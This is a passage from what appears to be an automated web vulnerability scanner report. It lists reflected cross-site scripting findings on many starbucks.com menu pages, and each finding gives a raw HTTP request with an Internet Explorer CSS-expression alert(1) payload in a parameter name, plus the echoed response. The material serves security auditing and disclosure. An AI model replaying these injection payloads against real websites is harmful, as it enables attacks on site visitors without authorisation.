Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:40:48 GMT
Connection: close
Content-Length: 42359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/refresh?9ec5e"style="x:expression(alert(1))"8df00c156e8=1"/>
...[SNIP]...

2.194. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2295e"style%3d"x%3aexpression(alert(1))"d67e805d73d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2295e"style="x:expression(alert(1))"d67e805d73d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade?2295e"style%3d"x%3aexpression(alert(1))"d67e805d73d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:30 GMT
Connection: close
Content-Length: 42306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade?2295e"style="x:expression(alert(1))"d67e805d73d=1"/>
...[SNIP]...

2.195. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-green-tea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 353c7"style%3d"x%3aexpression(alert(1))"a67357be292 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 353c7"style="x:expression(alert(1))"a67357be292 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/shaken-iced-green-tea?353c7"style%3d"x%3aexpression(alert(1))"a67357be292=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:05 GMT
Connection: close
Content-Length: 42111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea?353c7"style="x:expression(alert(1))"a67357be292=1"/>
...[SNIP]...

2.196. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 860c2"style%3d"x%3aexpression(alert(1))"e6b6821f468 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 860c2"style="x:expression(alert(1))"e6b6821f468 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade?860c2"style%3d"x%3aexpression(alert(1))"e6b6821f468=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:10 GMT
Connection: close
Content-Length: 42243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade?860c2"style="x:expression(alert(1))"e6b6821f468=1"/>
...[SNIP]...

2.197. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-passion-tea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b08c"style%3d"x%3aexpression(alert(1))"3cfb7a5dbfc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2b08c"style="x:expression(alert(1))"3cfb7a5dbfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/shaken-iced-passion-tea?2b08c"style%3d"x%3aexpression(alert(1))"3cfb7a5dbfc=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:40:43 GMT
Connection: close
Content-Length: 42165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea?2b08c"style="x:expression(alert(1))"3cfb7a5dbfc=1"/>
...[SNIP]...

2.198. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc369"style%3d"x%3aexpression(alert(1))"2ba0c3d405d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc369"style="x:expression(alert(1))"2ba0c3d405d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade?bc369"style%3d"x%3aexpression(alert(1))"2ba0c3d405d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:06 GMT
Connection: close
Content-Length: 42340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade?bc369"style="x:expression(alert(1))"2ba0c3d405d=1"/>
...[SNIP]...

2.199. http://www.starbucks.com/menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81de7"style%3d"x%3aexpression(alert(1))"adf0f936755 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81de7"style="x:expression(alert(1))"adf0f936755 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea?81de7"style%3d"x%3aexpression(alert(1))"adf0f936755=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:22 GMT
Connection: close
Content-Length: 42131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea?81de7"style="x:expression(alert(1))"adf0f936755=1"/>
...[SNIP]...

2.200. http://www.starbucks.com/menu/drinks/tazo-tea/vanilla-roobios-tea-latte [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/vanilla-roobios-tea-latte

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4bbc"style%3d"x%3aexpression(alert(1))"9b2bce3bcc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b4bbc"style="x:expression(alert(1))"9b2bce3bcc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/vanilla-roobios-tea-latte?b4bbc"style%3d"x%3aexpression(alert(1))"9b2bce3bcc9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:17 GMT
Connection: close
Content-Length: 42522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/vanilla-roobios-tea-latte?b4bbc"style="x:expression(alert(1))"9b2bce3bcc9=1"/>
...[SNIP]...

2.201. http://www.starbucks.com/menu/drinks/tazo-tea/zen [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/zen

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3af5b"style%3d"x%3aexpression(alert(1))"ab6cdbd263 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3af5b"style="x:expression(alert(1))"ab6cdbd263 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/tazo-tea/zen?3af5b"style%3d"x%3aexpression(alert(1))"ab6cdbd263=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:42 GMT
Connection: close
Content-Length: 42134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/zen?3af5b"style="x:expression(alert(1))"ab6cdbd263=1"/>
...[SNIP]...

2.202. http://www.starbucks.com/menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d939"style%3d"x%3aexpression(alert(1))"080e74fafa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d939"style="x:expression(alert(1))"080e74fafa0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie?8d939"style%3d"x%3aexpression(alert(1))"080e74fafa0=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:57 GMT
Connection: close
Content-Length: 41263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie?8d939"style="x:expression(alert(1))"080e74fafa0=1"/>
...[SNIP]...

2.203. http://www.starbucks.com/menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ace4c"style%3d"x%3aexpression(alert(1))"ab4d40a17c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ace4c"style="x:expression(alert(1))"ab4d40a17c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie?ace4c"style%3d"x%3aexpression(alert(1))"ab4d40a17c7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:46 GMT
Connection: close
Content-Length: 41042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie?ace4c"style="x:expression(alert(1))"ab4d40a17c7=1"/>
...[SNIP]...

2.204. http://www.starbucks.com/menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d51a"style%3d"x%3aexpression(alert(1))"b13ae9964f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6d51a"style="x:expression(alert(1))"b13ae9964f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie?6d51a"style%3d"x%3aexpression(alert(1))"b13ae9964f3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:11 GMT
Connection: close
Content-Length: 41086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie?6d51a"style="x:expression(alert(1))"b13ae9964f3=1"/>
...[SNIP]...

2.205. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d32a"style%3d"x%3aexpression(alert(1))"fa0c610012d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d32a"style="x:expression(alert(1))"fa0c610012d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food?5d32a"style%3d"x%3aexpression(alert(1))"fa0c610012d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:35 GMT
Connection: close
Content-Length: 59312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food?5d32a"style="x:expression(alert(1))"fa0c610012d=1"/>
...[SNIP]...

2.206. http://www.starbucks.com/menu/food/bakery/8-grain-roll [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/8-grain-roll

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d050a"style%3d"x%3aexpression(alert(1))"19e1c1b3a3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d050a"style="x:expression(alert(1))"19e1c1b3a3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and will not work in other browsers.

Request

GET /menu/food/bakery/8-grain-roll?d050a"style%3d"x%3aexpression(alert(1))"19e1c1b3a3d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:46:23 GMT
Connection: close
Content-Length: 44171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/8-grain-roll?d050a"style="x:expression(alert(1))"19e1c1b3a3d=1"/>
...[SNIP]...

2.207. http://www.starbucks.com/menu/food/bakery/apple-bran-muffin [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/apple-bran-muffin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b49f2"style%3d"x%3aexpression(alert(1))"d39bf9c38f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b49f2"style="x:expression(alert(1))"d39bf9c38f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and will not work in other browsers.

Request

